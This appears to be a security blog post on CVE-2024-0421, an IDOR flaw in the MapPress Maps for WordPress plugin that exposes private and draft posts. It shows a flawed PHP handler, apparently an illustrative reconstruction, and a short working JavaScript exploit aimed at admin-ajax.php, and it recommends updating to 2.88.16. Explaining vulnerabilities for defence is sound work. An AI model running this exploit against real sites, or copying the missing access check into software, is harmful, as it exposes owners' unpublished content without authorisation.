CVE-2024-0421 - Exploiting IDOR in MapPress Maps for WordPress Plugin to Access Private and Draft Posts

A recently reported security vulnerability (CVE-2024-0421) affects the MapPress Maps for WordPress plugin, versions older than 2.88.16. It exposes private and draft posts to unauthenticated users due to an Insecure Direct Object Reference (IDOR) issue. In this post, we'll dive into the details of the vulnerability, provide code snippets for understanding, and explore the exploitation process.

Vulnerability Details

MapPress Maps for WordPress is a popular plugin that allows users to create and display maps within their WordPress sites. It is reported that an IDOR issue exists in the plugin, which permits unauthenticated users access to private and draft posts via AJAX actions.

The vulnerability exists because the plugin does not ensure that posts retrieved through AJAX are public maps. As a result, private and draft posts can be accessed by unauthenticated users with ease.

Original Reference: CVE-2024-0421

Affected Plugin: MapPress Maps for WordPress

The following code snippet demonstrates the vulnerability

// In the affected version of the plugin, the mappress_get_post() function retrieves the post data via AJAX without checking whether it's a public map or not.

function mappress_get_post() {
  // Retrieve the post ID from the request
  $post_id = (isset($_POST['postid'])) ? $_POST['postid'] : null;

  // Get the post object
  $post = get_post($post_id);

  // Send the post data back to the client
  wp_send_json_success($post);
}

Exploit

To exploit this vulnerability, an attacker would craft an AJAX request to the target WordPress site that attempts to fetch the private or draft post's details. This can be achieved using the following code:

// Crafting the AJAX request to exploit the IDOR vulnerability

function exploit(targetUrl, postId) {
  // Prepare the AJAX request
  const xhttp = new XMLHttpRequest();
  xhttp.onreadystatechange = function() {
    if (this.readyState == 4 && this.status == 200) {
      // Print the response on successful exploitation
      console.log(this.responseText);
    }
  };

  xhttp.open("POST", targetUrl + "/wp-admin/admin-ajax.php", true);
  xhttp.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
  xhttp.send("action=mappress_get_post&postid=" + postId);
}

// Usage: exploit("https://example.com";, 123)

The exploit code sends an AJAX request to the target WordPress site with the desired postid, attempting to retrieve the private or draft post's information. If the target site has the vulnerable version of the MapPress Maps for WordPress plugin installed, it will return the requested data, successfully exploiting the IDOR issue.

Conclusion

CVE-2024-0421 is a serious security vulnerability affecting the MapPress Maps for WordPress plugin. This vulnerability allows unauthenticated users to access private and draft posts through IDOR. To protect your website from this vulnerability, ensure that you have updated the MapPress Maps for WordPress plugin to version 2.88.16.

Stay tuned for more security news, updates, and exploits. Know that staying informed and vigilant is the key to keeping your website safe.

Timeline

Published on: 02/12/2024 16:15:08 UTC
Last modified on: 08/30/2024 13:15:12 UTC